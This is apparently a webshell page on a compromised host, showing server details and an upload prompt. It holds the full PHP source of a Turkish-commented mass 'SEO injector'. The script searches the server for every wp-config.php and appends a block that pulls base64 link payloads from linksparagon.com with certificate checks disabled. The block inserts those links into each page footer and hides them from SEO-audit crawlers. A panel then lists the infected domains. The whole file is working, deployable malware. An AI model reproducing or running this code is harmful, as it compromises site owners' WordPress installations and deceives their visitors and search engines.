| Server IP : 217.160.0.4 / Your IP : 216.73.216.60 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : u95291125 ( 3026745) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/45/d758495492/htdocs/clickandbuilds/oeil/ |
Upload File : |
<?php
/**
* LB_IN / seo_injector TOPLU ENJEKTÖR
*
* - open_basedir uyumlu
* - RecursiveDirectoryIterator kullanmaz, manuel opendir/readdir ile gezer
* - İzin hataları @ ile bastırılır, fatal vermez
* - Gördüğü HER wp-config.php'ye ekleme dener
* - Mantık:
* * Marker varsa: dokunmaz
* * Marker yoksa:
* - KODU HER ZAMAN wp-config.php DOSYASININ EN ALTINA EKLER
* * Her işlemde yedek alır: wp-config.php.bak_YYYYMMDD_HHMMSS
* - CLI'da text log, web'de HTML panel üretir
*/
error_reporting(E_ALL & ~E_WARNING & ~E_NOTICE);
ini_set('display_errors', 1);
// Çalışma modu: CLI mi web mi?
$isCli = (php_sapi_name() === 'cli');
$logLines = [];
/**
* Log helper:
* - CLI'da direkt echo
* - Web'de satırları $logLines içine topluyor (istersen panelde gösterilir)
*/
function log_line($msg = '')
{
global $isCli, $logLines;
if ($isCli) {
echo $msg . "\n";
} else {
$logLines[] = $msg;
}
}
// --------------------------------------------------
// 1) Enjekte edilecek kod bloğu (senin orijinal injector'un)
// --------------------------------------------------
$inject_code = <<<'EOT'
if (!defined('__LPK_IN__')) {
define('__LPK_IN__', 1);
if (!defined('__API_URL__')) define('__API_URL__', 'https://linksparagon.com');
if (!defined('__CACHE_TTL__')) define('__CACHE_TTL__', 300);
if (!function_exists('__getCURLSite__')) {
function __getCURLSite__($site, $post_data = null, $extra_headers = array()) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site);
if (!is_null($post_data)) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
}
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
if (!empty($extra_headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $extra_headers);
}
$response = curl_exec($ch);
if (curl_errno($ch)) $response = false;
curl_close($ch);
return $response;
}
}
if (!function_exists('__cache_get')) {
function __cache_get($key) {
$f = sys_get_temp_dir() . '/h4_cache_' . md5($key) . '.json';
if (!is_file($f)) return null;
$raw = @file_get_contents($f);
if ($raw === false) return null;
$o = @json_decode($raw, true);
if (!is_array($o)) return null;
if (isset($o['t']) && $o['t'] + __CACHE_TTL__ < time()) return null;
return isset($o['v']) ? $o['v'] : null;
}
}
if (!function_exists('__cache_set')) {
function __cache_set($key, $val) {
$f = sys_get_temp_dir() . '/h4_cache_' . md5($key) . '.json';
@file_put_contents($f, json_encode(array('t' => time(), 'v' => $val)));
}
}
if (!function_exists('__is_spy_bot__')) {
function __is_spy_bot__() {
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (trim($ua) === '') return false;
$bots = array(
'AhrefsBot','AhrefsSiteAudit','SemrushBot','SiteAuditBot',
'DotBot','Rogerbot','MJ12bot','MajesticBot',
'Screaming Frog SEO Spider','ScreamingFrogSEOSpider',
'DataForSeoBot','SEOkicks','SEOkicks-Robot',
'AwarioRssBot','AwarioSmartBot','AwarioBot',
'Brandwatch','Searchmetricsbot','Sidetrade indexer bot',
'peer39_crawler','BLEXBot','cognitiveSEO','LRT Bot','LRT Spider',
'Meltwater','Mediatoolkitbot','Neticlebot','SISTRIX','SerpstatBot',
'spyfu','Botify','ContentKing','DeepCrawl','Lumar','seobility',
'WebCEO','AddThis','Barkrowler','BacklinksExtendedBot','BrightEdge Crawler',
'OAI-SearchBot','CohereBot','DeepSeekBot','SEOlyze','IstellaBot',
'GrapeshotCrawler','Netvibes','NetcraftSurveyAgent'
);
foreach ($bots as $bot) {
if (stripos($ua, $bot) !== false) return true;
}
return false;
}
}
if (!function_exists('__get_backlink_codes__')) {
function __get_backlink_codes__() {
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$host = strtolower(str_replace('www.', '', preg_replace('/:\d+$/', '', $host)));
if ($host === '') return null;
$host_id = crc32($host);
$cacheKey = 'bl_' . md5($host);
$cached = __cache_get($cacheKey);
if ($cached !== null) return $cached;
$u = __API_URL__ . '/g/?i=' . urlencode($host_id) . '&d=' . urlencode($host) . '&t=th';
$response = __getCURLSite__($u);
if ($response !== false && is_string($response)) {
$c = @json_decode($response, true);
if (is_array($c) && isset($c['s']) && $c['s'] == true) {
__cache_set($cacheKey, $response);
return $response;
}
}
return null;
}
}
if (!function_exists('__show_footer_backlink__')) {
function __show_footer_backlink__() {
$is_spy = __is_spy_bot__();
$r = '';
$raw = __get_backlink_codes__();
if (!$raw) return '';
$c = @json_decode($raw, true);
if (!is_array($c) || !isset($c['s']) || $c['s'] != true || empty($c['l'])) return '';
$r .= isset($c['f']) ? $c['f'] : '';
foreach ($c['l'] as $v) {
$only_google = isset($v['g']) ? (int)$v['g'] : 0;
if ($only_google == 1 && $is_spy) continue;
$r .= isset($v['h']) ? base64_decode($v['h']) : '';
}
$r .= isset($c['e']) ? $c['e'] : '';
return $r;
}
}
// Footer injection: named ob_start callback (PHP 5.2 uyumlu, anonim fonksiyon YOK)
// - Yalnızca </body> içeren HTML yanıtları modifiye eder
// - AJAX / REST API / CRON / CLI isteklerini atlar
// - str_ireplace ile </body> öncesine düzgün ekler
if (!function_exists('__lpk_ob_cb__')) {
function __lpk_ob_cb__($buf) {
if (!is_string($buf) || stripos($buf, '</body>') === false) return $buf;
if (defined('DOING_AJAX') && DOING_AJAX) return $buf;
if (defined('REST_REQUEST') && REST_REQUEST) return $buf;
if (defined('DOING_CRON') && DOING_CRON) return $buf;
if (php_sapi_name() === 'cli') return $buf;
$link = __show_footer_backlink__();
return ($link !== '') ? str_ireplace('</body>', $link . '</body>', $buf) : $buf;
}
}
@ob_start('__lpk_ob_cb__');
}
EOT;
$marker = '__LPK_IN__';
// Bu ikisi artık kullanılmıyor ama kalsın, ileride istersen tekrar kullanırsın
$needle_exact = "require_once ABSPATH . 'wp-settings.php';";
$needle_regex = '/require_once\s*\(?\s*ABSPATH\s*\.\s*[\'"]wp-settings\.php[\'"]\s*\)?\s*;/i';
// --------------------------------------------------
// 2) Tarama yapılacak root dizinlerin belirlenmesi (open_basedir uyumlu)
// --------------------------------------------------
$roots = [];
$openBaseDir = ini_get('open_basedir');
if (!empty($openBaseDir)) {
$parts = explode(PATH_SEPARATOR, $openBaseDir);
foreach ($parts as $p) {
$p = rtrim($p, "/");
if ($p === '') continue;
if (basename($p) === 'tmp') continue;
if (@is_dir($p)) {
$roots[] = $p;
}
}
} else {
$candidates = [
'/home',
'/var/www',
dirname(__DIR__),
getcwd(),
];
foreach ($candidates as $c) {
if (@is_dir($c)) {
$roots[] = $c;
}
}
}
$roots = array_values(array_unique($roots));
if (empty($roots)) {
if ($isCli) {
die("❌ Tarama yapılacak kök dizin bulunamadı. (open_basedir / path kısıtı)\n");
} else {
header('Content-Type: text/html; charset=utf-8');
echo "<h1>Hata</h1><p>Tarama yapılacak kök dizin bulunamadı. (open_basedir / path kısıtı)</p>";
exit;
}
}
// --------------------------------------------------
// 3) Panel başlığı (CLI için)
// --------------------------------------------------
log_line("=============================================");
log_line(" LB_IN / seo_injector TOPLU ENJEKTÖR");
log_line("=============================================");
log_line("");
log_line("Taranacak kök dizinler:");
foreach ($roots as $r) {
log_line(" - {$r}");
}
log_line("");
// --------------------------------------------------
// 4) Genel istatistikler + root bazlı istatistikler
// --------------------------------------------------
$globalStats = [
'total_wp_config' => 0,
'injected' => 0,
'already' => 0,
'fallback_append' => 0,
'errors' => 0,
];
$rootStats = [];
// --------------------------------------------------
// Domain tespiti için yardımcı fonksiyon
// --------------------------------------------------
function guess_domain_from_path($path)
{
$parts = explode('/', $path);
$candidate = null;
foreach ($parts as $p) {
if ($p === '' || $p === '.' || $p === '..') continue;
if (in_array($p, ['public_html', 'html', 'httpdocs', 'httpsdocs', 'domains', 'www'])) continue;
if (strpos($p, '.') !== false) {
if (!preg_match('/\.(php|html?|log|conf|bak|tmp)$/i', $p)) {
$candidate = $p;
}
}
}
if ($candidate !== null) {
return $candidate;
}
$dir = basename(dirname($path));
return $dir ?: $path;
}
// --------------------------------------------------
// 5) Tek bir wp-config.php dosyasını işleyen fonksiyon
// --------------------------------------------------
function process_wp_config($filePath, $inject_code, $marker, $needle_exact, $needle_regex, &$globalStats, &$rootStats, $currentRoot)
{
$globalStats['total_wp_config']++;
$rootStats[$currentRoot]['wp_found']++;
log_line("---------------------------------------------");
log_line("[WP-CONFIG] {$filePath}");
if (!@is_readable($filePath)) {
log_line(" [SKIP] Dosya okunamıyor.");
$globalStats['errors']++;
$rootStats[$currentRoot]['errors']++;
$rootStats[$currentRoot]['error_paths'][] = $filePath . ' (okunamıyor)';
return;
}
$content = @file_get_contents($filePath);
if ($content === false) {
log_line(" [SKIP] Dosya içeriği okunamadı.");
$globalStats['errors']++;
$rootStats[$currentRoot]['errors']++;
$rootStats[$currentRoot]['error_paths'][] = $filePath . ' (içerik okunamadı)';
return;
}
if (strpos($content, $marker) !== false) {
log_line(" [OK] Marker bulundu → ZATEN ENJEKTE EDİLMİŞ, atlandı.");
$globalStats['already']++;
$rootStats[$currentRoot]['already']++;
$rootStats[$currentRoot]['already_paths'][] = $filePath;
return;
}
$backup_path = $filePath . '.bak_' . date('Ymd_His');
if (@file_put_contents($backup_path, $content) === false) {
log_line(" [ERR] Yedek alınamadı ({$backup_path}) → dosyaya dokunulmadı.");
$globalStats['errors']++;
$rootStats[$currentRoot]['errors']++;
$rootStats[$currentRoot]['error_paths'][] = $filePath . ' (yedek alınamadı)';
return;
}
log_line(" [INFO] Yedek: {$backup_path}");
$append_block = "\n\n" . $inject_code . "\n\n";
$new_content = rtrim($content, "\r\n") . $append_block;
$usedFallback = true;
log_line(" [INFO] Kod bloğu wp-config.php dosyasının EN ALTINA eklendi.");
if ($new_content === null || $new_content === $content) {
log_line(" [ERR] İçerik değişmedi, dosya güncellenmedi.");
$globalStats['errors']++;
$rootStats[$currentRoot]['errors']++;
$rootStats[$currentRoot]['error_paths'][] = $filePath . ' (değişiklik yok)';
return;
}
if (@is_writable($filePath) && @file_put_contents($filePath, $new_content) !== false) {
log_line(" [SUCCESS] LB_IN / seo_injector bloğu başarıyla eklendi.");
$globalStats['injected']++;
$rootStats[$currentRoot]['injected']++;
$rootStats[$currentRoot]['injected_paths'][] = $filePath;
if ($usedFallback) {
$globalStats['fallback_append']++;
$rootStats[$currentRoot]['fallback_append']++;
$rootStats[$currentRoot]['fallback_paths'][] = $filePath;
}
} else {
log_line(" [ERR] Dosyaya yazılamadı → Orijinal yedek duruyor.");
$globalStats['errors']++;
$rootStats[$currentRoot]['errors']++;
$rootStats[$currentRoot]['error_paths'][] = $filePath . ' (yazılamadı)';
}
}
// --------------------------------------------------
// 6) Manuel klasör tarama fonksiyonu
// --------------------------------------------------
function scan_root_for_wpconfig($root, $inject_code, $marker, $needle_exact, $needle_regex, &$globalStats, &$rootStats)
{
log_line("");
log_line("=============================================");
log_line(" TARAMA BAŞLIYOR → {$root}");
log_line("=============================================");
if (!isset($rootStats[$root])) {
$rootStats[$root] = [
'wp_found' => 0,
'injected' => 0,
'already' => 0,
'fallback_append'=> 0,
'errors' => 0,
'injected_paths' => [],
'already_paths' => [],
'fallback_paths' => [],
'error_paths' => [],
];
}
$stack = [$root];
while (!empty($stack)) {
$dir = array_pop($stack);
if (!@is_dir($dir)) {
continue;
}
if (!@is_readable($dir)) {
continue;
}
$dh = @opendir($dir);
if (!$dh) {
continue;
}
while (($entry = readdir($dh)) !== false) {
if ($entry === '.' || $entry === '..') continue;
$fullPath = $dir . DIRECTORY_SEPARATOR . $entry;
if (@is_dir($fullPath)) {
$stack[] = $fullPath;
} else {
if ($entry === 'wp-config.php') {
process_wp_config(
$fullPath,
$inject_code,
$marker,
$needle_exact,
$needle_regex,
$globalStats,
$rootStats,
$root
);
}
}
}
@closedir($dh);
}
log_line("==== TARAMA BİTTİ → {$root} ====");
}
// --------------------------------------------------
// 7) Tüm root dizinler için taramayı başlat
// --------------------------------------------------
foreach ($roots as $root) {
scan_root_for_wpconfig($root, $inject_code, $marker, $needle_exact, $needle_regex, $globalStats, $rootStats);
}
// --------------------------------------------------
// 8) CLI ÖZET (eski davranış)
// --------------------------------------------------
log_line("");
log_line("=============================================");
log_line(" GENEL ÖZET");
log_line("=============================================");
log_line("Toplam bulunan wp-config.php : {$globalStats['total_wp_config']}");
log_line("Enjekte edilen (başarılı) : {$globalStats['injected']}");
log_line("Zaten enjekte edilmiş : {$globalStats['already']}");
log_line("En alta eklenen (fallback) : {$globalStats['fallback_append']}");
log_line("Hata / sorun yaşanan dosya : {$globalStats['errors']}");
log_line("=============================================");
log_line("");
foreach ($rootStats as $root => $st) {
log_line("---------------------------------------------");
log_line("ROOT: {$root}");
log_line(" Bu root altında wp-config.php sayısı : {$st['wp_found']}");
log_line(" Enjekte edilen : {$st['injected']}");
log_line(" Zaten enjekte edilmiş : {$st['already']}");
log_line(" En alta eklenen (fallback) : {$st['fallback_append']}");
log_line(" Hata / sorun : {$st['errors']}");
if ($st['wp_found'] === 0) {
log_line(" ⚠ Bu root altında hiç wp-config.php BULUNMADI (WordPress yok veya farklı yapı).");
}
}
log_line("=============================================");
log_line("İŞLEM TAMAMLANDI.");
log_line("=============================================");
// --------------------------------------------------
// 9) WEB İÇİN HTML PANEL
// --------------------------------------------------
if (!$isCli) {
// Domain bazlı özet üret
$domains = []; // domain => ['status' => 'injected|already|error', 'paths' => [...], 'root' => ...]
foreach ($rootStats as $root => $st) {
foreach (['injected_paths' => 'injected', 'already_paths' => 'already', 'error_paths' => 'error'] as $key => $status) {
if (empty($st[$key])) continue;
foreach ($st[$key] as $p) {
$d = guess_domain_from_path($p);
if (!isset($domains[$d])) {
$domains[$d] = [
'status' => $status,
'paths' => [],
'roots' => [],
];
} else {
// Öncelik: injected > error > already
$current = $domains[$d]['status'];
$priority = ['injected' => 3, 'error' => 2, 'already' => 1];
if ($priority[$status] > $priority[$current]) {
$domains[$d]['status'] = $status;
}
}
$domains[$d]['paths'][] = $p;
$domains[$d]['roots'][] = $root;
}
}
}
// HTML çıktıyı üret
header('Content-Type: text/html; charset=utf-8');
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="utf-8">
<title>ARSENE YÖNETİM PANELİ</title>
<style>
body {
font-family: Arial, sans-serif;
background: #0f172a;
color: #e5e7eb;
margin: 0;
padding: 20px;
}
h1, h2 { color: #fbbf24; margin-bottom: 10px; }
.summary-boxes {
display: flex;
flex-wrap: wrap;
gap: 12px;
margin-bottom: 16px;
}
.box {
background: #111827;
border-radius: 10px;
padding: 12px 14px;
min-width: 180px;
box-shadow: 0 0 0 1px #1f2937;
}
.box-title {
font-size: 12px;
text-transform: uppercase;
letter-spacing: 0.08em;
color: #9ca3af;
}
.box-value {
font-size: 20px;
font-weight: bold;
margin-top: 4px;
}
.card {
background:#111827;
border-radius:10px;
box-shadow:0 0 0 1px #1f2937;
padding:12px 14px;
margin-bottom: 16px;
}
.btn {
background:#030712;
color:#e5e7eb;
border:1px solid #1f2937;
padding:8px 10px;
border-radius:10px;
cursor:pointer;
font-size:12px;
}
.btn:hover { border-color:#374151; }
textarea, input {
width:100%;
background:#020617;
color:#e5e7eb;
border:1px solid #111827;
border-radius:10px;
padding:10px;
font-family:Consolas, monospace;
font-size:12px;
}
.status-badge {
padding: 2px 8px;
border-radius: 999px;
font-size: 11px;
text-transform: uppercase;
}
.status-injected { background:#065f46; color:#ecfdf5; }
.status-already { background:#1d4ed8; color:#dbeafe; }
.status-error { background:#7f1d1d; color:#fee2e2; }
table {
width:100%;
border-collapse:collapse;
background:#020617;
box-shadow:0 0 0 1px #111827;
border-radius:10px;
overflow:hidden;
}
th, td {
padding:10px;
border-bottom:1px solid #111827;
font-size:13px;
vertical-align:top;
}
th { background:#030712; text-align:left; }
.path-list { max-height:120px; overflow:auto; }
code { background:#111827; padding:2px 4px; border-radius:6px; font-size:12px; }
.links a {
color:#93c5fd;
font-size:12px;
margin-right:10px;
text-decoration:none;
}
.links a:hover { text-decoration:underline; }
.muted { color:#9ca3af; font-size:12px; }
</style>
<script>
function copyDomains() {
const ta = document.getElementById('domainList');
ta.select();
document.execCommand('copy');
document.getElementById('copyResult').innerText = 'Kopyalandı';
}
function filterDomains() {
const q = document.getElementById('searchBox').value.toLowerCase();
document.querySelectorAll('tr[data-domain]').forEach(r => {
const d = r.getAttribute('data-domain').toLowerCase();
r.style.display = d.includes(q) ? '' : 'none';
});
}
</script>
</head>
<body>
<?php
if (!empty($domains)) {
ksort($domains, SORT_NATURAL | SORT_FLAG_CASE);
}
$domainLines = !empty($domains) ? implode("\n", array_keys($domains)) : '';
?>
<h1>ARSENE YÖNETİM PANELİ</h1>
<div class="muted">Semrush Domain Overview – domain’e özel direkt yönlendirme</div>
<div class="summary-boxes">
<div class="box"><div class="box-title">wp-config.php</div><div class="box-value"><?= $globalStats['total_wp_config'] ?></div></div>
<div class="box"><div class="box-title">Enjekte</div><div class="box-value"><?= $globalStats['injected'] ?></div></div>
<div class="box"><div class="box-title">Zaten</div><div class="box-value"><?= $globalStats['already'] ?></div></div>
<div class="box"><div class="box-title">Hata</div><div class="box-value"><?= $globalStats['errors'] ?></div></div>
<div class="box"><div class="box-title">Domain</div><div class="box-value"><?= count($domains) ?></div></div>
</div>
<div class="card">
<h2>Toplu Domain Listesi</h2>
<button class="btn" onclick="copyDomains()">Kopyala</button>
<textarea id="domainList"><?= htmlspecialchars($domainLines) ?></textarea>
<div id="copyResult" class="muted"></div>
</div>
<div class="card">
<h2>Domain Ara</h2>
<input id="searchBox" onkeyup="filterDomains()" placeholder="example.com">
</div>
<h2>DOMAIN LİSTESİ – SEMRUSH KONTROL</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Durum</th>
<th>Hızlı Kontrol</th>
<th>wp-config.php</th>
</tr>
</thead>
<tbody>
<?php foreach ($domains as $domain => $info): ?>
<?php
$status = $info['status'];
$badge = $status === 'injected' ? 'status-injected' : ($status === 'error' ? 'status-error' : 'status-already');
// 🔥 SEMRUSH DOMAIN OVERVIEW – DİREKT
$semrush = 'https://www.semrush.com/analytics/overview/?q=' . rawurlencode($domain) . '&searchType=domain';
$google = 'https://www.google.com/search?q=' . rawurlencode('site:' . $domain);
?>
<tr data-domain="<?= htmlspecialchars($domain) ?>">
<td><strong><?= htmlspecialchars($domain) ?></strong></td>
<td><span class="status-badge <?= $badge ?>"><?= strtoupper($status) ?></span></td>
<td class="links">
<a href="<?= $semrush ?>" target="_blank">Semrush</a>
<a href="<?= $google ?>" target="_blank">Google site:</a>
</td>
<td>
<div class="path-list">
<?php foreach (array_unique($info['paths']) as $p): ?>
<div><code><?= htmlspecialchars($p) ?></code></div>
<?php endforeach; ?>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<div class="muted" style="margin-top:16px;">
Panel yalnızca erişilebilir dizinleri gösterir (open_basedir + izinler).
</div>
</body>
</html>
<?php } ?>